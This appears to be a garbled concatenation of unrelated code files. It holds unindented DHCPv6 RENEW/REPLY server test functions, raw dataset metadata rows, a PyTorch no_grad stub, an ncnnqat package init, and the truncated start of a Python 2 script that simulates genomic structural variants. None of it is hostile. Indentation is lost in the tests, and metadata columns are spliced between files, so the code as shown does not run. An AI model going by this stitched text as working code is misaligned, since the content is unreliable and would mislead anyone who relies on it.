srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.renew
def test_v6_message_renew_reply_different_clients_the_same_iaid():
# Two clients try to renew address, using the same IA_ID but different Client-ID
misc.test_setup()
srv_control.set_time('renew-timer', '50')
srv_control.set_time('rebind-timer', '60')
srv_control.set_time('preferred-lifetime', '70')
srv_control.set_time('valid-lifetime', '80')
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::2')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
# client try to renew address that is not his
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'validlft', '0')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::2')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'validlft', '80')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::1')
references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.renew
def test_v6_message_renew_reply_different_clients_the_same_iaid_2():
# Two clients try to renew address, using the same IA_ID but different Client-ID
misc.test_setup()
srv_control.set_time('renew-timer', '50')
srv_control.set_time('rebind-timer', '60')
srv_control.set_time('preferred-lifetime', '70')
srv_control.set_time('valid-lifetime', '80')
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::2')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
# client try to renew address that is his
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
# Response sub-option 5 from option 3 MUST contain validlft 0.
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::2')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'validlft', '80')
srv_msg.response_check_suboption_content('Response', '5', '3', 'NOT ', 'addr', '3000::1')
references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.renew
def test_v6_message_renew_reply_different_clients_the_same_iaid_expired():
# Two clients try to renew address, using the same IA_ID but different Client-ID
misc.test_setup()
srv_control.set_time('renew-timer', '5')
srv_control.set_time('rebind-timer', '6')
srv_control.set_time('preferred-lifetime', '7')
srv_control.set_time('valid-lifetime', '8')
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::2')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.forge_sleep('10', 'seconds')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::2')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::1')
references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.renew
def test_v6_message_renew_reply_different_clients_the_same_iaid_expired_2():
# Two clients try to renew address, using the same IA_ID but different Client-ID
misc.test_setup()
srv_control.set_time('renew-timer', '5')
srv_control.set_time('rebind-timer', '6')
srv_control.set_time('preferred-lifetime', '7')
srv_control.set_time('valid-lifetime', '8')
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::2')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.forge_sleep('10', 'seconds')
misc.test_procedure()
# client try to renew address that is his
srv_msg.client_sets_value('Client', 'ia_id', '666')
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
# Response sub-option 5 from option 3 MUST contain validlft 0.
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::2')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'validlft', '8')
srv_msg.response_check_suboption_content('Response', '5', '3', 'NOT ', 'addr', '3000::1')
references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.renew
def test_v6_message_renew_reply_time_zero():
# Testing server ability to perform message exchange RENEW - REPLY
# In case when we expect that address is not appropriate for the link.
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# Save IA_NA with IA_Addr <-- REPLY
# Reconfigure Server
# SOLICIT -->
# <-- ADVERTISE
# Create leases REQUEST -->
# for the same client <-- REPLY
# Use saved IA_NA RENEW -->
# (proper client ID, IA_NA, but wrong address)
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# IA-NA with suboption IA-Address with validlft set to 0.
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::66-3000::66')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.client_save_option('IA_NA')
misc.reconfigure()
srv_control.config_srv_subnet('3000::/64', '3000::100-3000::155')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('server-id')
srv_msg.client_copy_option('IA_NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('server-id')
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::66')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'validlft', '0')
references.references_check('RFC')
| 43.597378
| 93
| 0.705855
| 3,454
| 23,281
| 4.408512
| 0.042559
| 0.107178
| 0.111906
| 0.123531
| 0.968805
| 0.968805
| 0.968805
| 0.962369
| 0.960071
| 0.952978
| 0
| 0.036342
| 0.137193
| 23,281
| 533
| 94
| 43.679174
| 0.721711
| 0.069456
| 0
| 0.953202
| 0
| 0
| 0.200463
| 0.026833
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014778
| true
| 0.068966
| 0.012315
| 0
| 0.027094
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
5464ce9d7c69e701634f2888b73b8ea0477483b3
| 333
|
py
|
Python
|
packages/pytea/pylib/torch/autograd/grad_mode.py
|
Sehun0819/pytea
|
3f068016a71a1915722e51d977fedab01427a42c
|
[
"MIT"
] | 241
|
2021-03-19T01:11:44.000Z
|
2022-03-25T03:15:22.000Z
|
packages/pytea/pylib/torch/autograd/grad_mode.py
|
Sehun0819/pytea
|
3f068016a71a1915722e51d977fedab01427a42c
|
[
"MIT"
] | 2
|
2021-02-26T08:16:04.000Z
|
2022-02-28T02:52:58.000Z
|
packages/pytea/pylib/torch/autograd/grad_mode.py
|
Sehun0819/pytea
|
3f068016a71a1915722e51d977fedab01427a42c
|
[
"MIT"
] | 14
|
2021-01-08T02:22:58.000Z
|
2022-01-19T14:13:14.000Z
|
class no_grad:
def __enter__(self):
return None
def __exit__(self, *args):
return True
def __call__(self, func):
return self
class enable_grad:
def __enter__(self):
return None
def __exit__(self, *args):
return True
def __call__(self, func):
return self
| 15.136364
| 30
| 0.588589
| 40
| 333
| 4.25
| 0.35
| 0.082353
| 0.141176
| 0.188235
| 0.894118
| 0.894118
| 0.894118
| 0.894118
| 0.894118
| 0.894118
| 0
| 0
| 0.333333
| 333
| 21
| 31
| 15.857143
| 0.765766
| 0
| 0
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0
| 0.428571
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 10
|
54952a4a8faa64c84f2f6f50d8e4e3a7d7f489d4
| 277
|
py
|
Python
|
ncnnqat/__init__.py
|
shenmayufei/ncnnqat
|
0a514665414d2f5856467e95989db7de7633b14d
|
[
"MIT"
] | 59
|
2021-06-22T13:43:50.000Z
|
2022-03-30T03:28:10.000Z
|
ncnnqat/__init__.py
|
shenmayufei/ncnnqat
|
0a514665414d2f5856467e95989db7de7633b14d
|
[
"MIT"
] | null | null | null |
ncnnqat/__init__.py
|
shenmayufei/ncnnqat
|
0a514665414d2f5856467e95989db7de7633b14d
|
[
"MIT"
] | 9
|
2021-06-22T14:36:14.000Z
|
2021-11-08T03:37:49.000Z
|
import sys
try:
from .quantize import unquant_weight, freeze_bn, \
merge_freeze_bn, register_quantization_hook,save_table
except:
raise
__all__ = [
"unquant_weight", "freeze_bn", "merge_freeze_bn", \
"register_quantization_hook","save_table"]
| 25.181818
| 62
| 0.707581
| 33
| 277
| 5.393939
| 0.545455
| 0.179775
| 0.213483
| 0.235955
| 0.752809
| 0.752809
| 0.752809
| 0.752809
| 0.752809
| 0.752809
| 0
| 0
| 0.198556
| 277
| 10
| 63
| 27.7
| 0.801802
| 0
| 0
| 0
| 0
| 0
| 0.268116
| 0.094203
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.222222
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54b73d4492f7b5357d54e5870dd217f28ae6f560
| 152,415
|
py
|
Python
|
Support.Scripts/Produce.Simulated.FussyJuncs.py
|
mills-lab/svelter
|
d318b06d588483fe8a8ebcac8c8a6c7878f2c2b3
|
[
"MIT"
] | 21
|
2015-11-02T06:31:52.000Z
|
2021-12-20T03:14:04.000Z
|
Support.Scripts/Produce.Simulated.FussyJuncs.py
|
mills-lab/svelter
|
d318b06d588483fe8a8ebcac8c8a6c7878f2c2b3
|
[
"MIT"
] | 14
|
2016-03-02T21:12:53.000Z
|
2019-08-02T20:01:02.000Z
|
Support.Scripts/Produce.Simulated.FussyJuncs.py
|
mills-lab/svelter
|
d318b06d588483fe8a8ebcac8c8a6c7878f2c2b3
|
[
"MIT"
] | 6
|
2015-08-19T18:33:02.000Z
|
2017-05-16T03:42:57.000Z
|
#!/usr/bin/env python
#!python
#command='Produce.Simulated.FussyJuncs.py heterozygous --reference /mnt/EXT/Mills-scratch2/reference/GRCh37/human_g1k_v37.fasta --input-sim /mnt/EXT/Mills-scratch2/Xuefang/Simulate.FussyJunc/Simulate.het.rerun.test.20150901/het.sim --output-prefix /mnt/EXT/Mills-scratch2/Xuefang/Simulate.FussyJunc/Simulate.het.rerun.test.20150901/het'
#sys.argv=command.split()
import os
import sys
import getopt
import re
import pickle
import time
import datetime
import random
import numpy
import glob
import numpy as np
from scipy.stats import scoreatpercentile
script_name=sys.argv[0]
if len(sys.argv)<2:
print 'Produce.Simulated.FussyJuncs.py Last Update:2015-08-20'
print ''
print 'this script is used to randomly simulate simple/complex SVs and form a corresponding altered reference genome'
print ''
print 'Usage:'
print 'Produce.Simulated.FussyJuncs.py [options] <parameters>'
print ' '
print 'Options:'
print 'heterozygous: simulate simple heterozygous SVs'
print 'homozygous: simulate simple homozygous SVs'
print 'complex: simulate complex SVs'
print ' '
print 'Parameters:'
print '--reference: reference genme'
print '--input-sim: input sim format,see example'
print '--input-rec: input rec format, specially designed for complex events,see example'
print '--output-prefix: prefix of output files'
else:
function_name=sys.argv[1]
def insert_read_decide(bp_list):
#decide which class to simulate, ClassI~71%, ClassII~29%
SV_class_decide=random.choice(range(100))
if SV_class_decide>70:#if ClassII
sub_class_decide=random.choice(range(100))
if sub_class_decide<60:#2-20bp micro insertion of random seqs
return produce_random_seqs(random.choice(range(2,20)))
else: #over 20bp insertion
sub2_class_decide=random.choice(range(100))
if sub2_class_decide<25: #25%, 20-50bp random seqs
return produce_random_seqs(random.choice(range(20,50)))
elif sub2_class_decide<50: #25%, 20-50bp seqs from another chromosome
temp=[]
for x in seq_ins_pools.keys():
if not x==bp_list[0]:
temp.append(x)
return random.choice(seq_ins_pools[random.choice(temp)])
else: #50%, 20-50bp seqs from the same chromosome
if bp_list[0] in seq_ins_pools.keys():
return random.choice(seq_ins_pools[bp_list[0]])
else:
return ''
else:#if ClassI
return ''
if function_name=='heterozygous':
def sv_rec_2(sv_info):
for k1ab in sorted(sv_info.keys()):
for k2ab in sv_info[k1ab].keys():
if not k2ab==k1ab:
k1aba=k1ab.split('/')[0]
k2aba=k2ab.split('/')[0]
k2abb=k2ab.split('/')[1]
flaga=[]
flagb=[]
test=[[],[]]
if flaga==[] and not k1aba==k2aba:
if k2aba=='':
csv1=[[i for i in k1aba],[],[],0]
else:
csv1=simple_flag_SA(k1aba,k2aba)
add_csv_info(csv1,1,k1ab,k2ab)
if flagb==[] and not k1aba==k2abb:
if k2abb=='':
csv1=[[i for i in k2abb],[],[],0]
else:
csv1=simple_flag_SA(k1aba,k2abb)
add_csv_info(csv1,2,k1ab,k2ab)
score_Cff=-20
def hash_reorder():
for ka1 in del1.keys():
if not ka1 in sv_out.keys():
sv_out[ka1]={}
for ka2 in del1[ka1]:
#fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,ka1,str(ka2[0]+1),str(ka2[0]+1)))
#tre=fref.readline().strip().split()
#REF_AL=fref.readline().strip().split()[0]
REF_AL='N'
Pass_Sign='PASS'
if ka2[3]<score_Cff:
Pass_Sign='LowQual'
if ka2[2]=='heta':
GenoType='1|0'
elif ka2[2]=='hetb':
GenoType='0|1'
elif ka2[2]=='homo':
GenoType='1|1'
ka_new=[ka1,ka2[0],ka2[-1],REF_AL,'<DEL>',ka2[3],Pass_Sign,'SVTYPE=DEL;END='+str(ka2[1]),'GT',GenoType]
if not ka2[-1] in sv_out[ka1].keys():
sv_out[ka1][ka2[-1]]=[]
if not ka_new in sv_out[ka1][ka2[-1]]:
sv_out[ka1][ka2[-1]].append(ka_new)
for ka1 in inv1.keys():
if not ka1 in sv_out.keys():
sv_out[ka1]={}
for ka2 in inv1[ka1]:
#fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,ka1,str(ka2[0]+1),str(ka2[0]+1)))
#tre=fref.readline().strip().split()
#REF_AL=fref.readline().strip().split()[0]
REF_AL='N'
Pass_Sign='PASS'
if ka2[3]<score_Cff:
Pass_Sign='LowQual'
if ka2[2]=='heta':
GenoType='1|0'
elif ka2[2]=='hetb':
GenoType='0|1'
elif ka2[2]=='homo':
GenoType='1|1'
ka_new=[ka1,ka2[0],ka2[-1],REF_AL,'<INV>',ka2[3],Pass_Sign,'SVTYPE=INV;END='+str(ka2[1]),'GT',GenoType]
if not ka2[-1] in sv_out[ka1].keys():
sv_out[ka1][ka2[-1]]=[]
if not ka_new in sv_out[ka1][ka2[-1]]:
sv_out[ka1][ka2[-1]].append(ka_new)
for ka1 in dup1.keys():
if not ka1 in sv_out.keys():
sv_out[ka1]={}
for ka2 in dup1[ka1]:
#fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,ka1,str(ka2[0]+1),str(ka2[0]+1)))
#tre=fref.readline().strip().split()
#REF_AL=fref.readline().strip().split()[0]
REF_AL='N'
CopyNumber=str(ka2[-1])
Pass_Sign='PASS'
if ka2[3]<score_Cff:
Pass_Sign='LowQual'
if ka2[2]=='heta':
GenoType='1|0'
elif ka2[2]=='hetb':
GenoType='0|1'
elif ka2[2]=='homo':
GenoType='1|1'
ka_new=[ka1,ka2[0],ka2[-2],REF_AL,'<DUP>',ka2[3],Pass_Sign,'SVTYPE=DUP;END='+str(ka2[1]),'GT:CN',GenoType+':'+CopyNumber]
if not ka2[-2] in sv_out[ka1].keys():
sv_out[ka1][ka2[-2]]=[]
if not ka_new in sv_out[ka1][ka2[-2]]:
sv_out[ka1][ka2[-2]].append(ka_new)
for ka1 in tra1.keys():
ks1=ka1.split('_')[0]
ks2='_'.join(ka1.split('_')[:-1])
SV_Score=float(ka1.split('_')[-1])
Pass_Sign='PASS'
if SV_Score<score_Cff:
Pass_Sign='LowQual'
if not ks1 in sv_out.keys():
sv_out[ks1]={}
if not ks2 in sv_out[ks1].keys():
sv_out[ks1][ks2]=[]
for ka2 in tra1[ka1].keys():
hetx='het'+ka2
if ka2=='a':
GenoType='1|0'
elif ka2=='b':
Genotype='0|1'
for ka3 in tra1[ka1][ka2]:
ka_new=ka3[:2]+[ks2,ka3[2]]+ka3[3:]+[SV_Score,Pass_Sign,'SVTYPE=TRA','GT',GenoType]
if not ka_new in sv_out[ks1][ks2]:
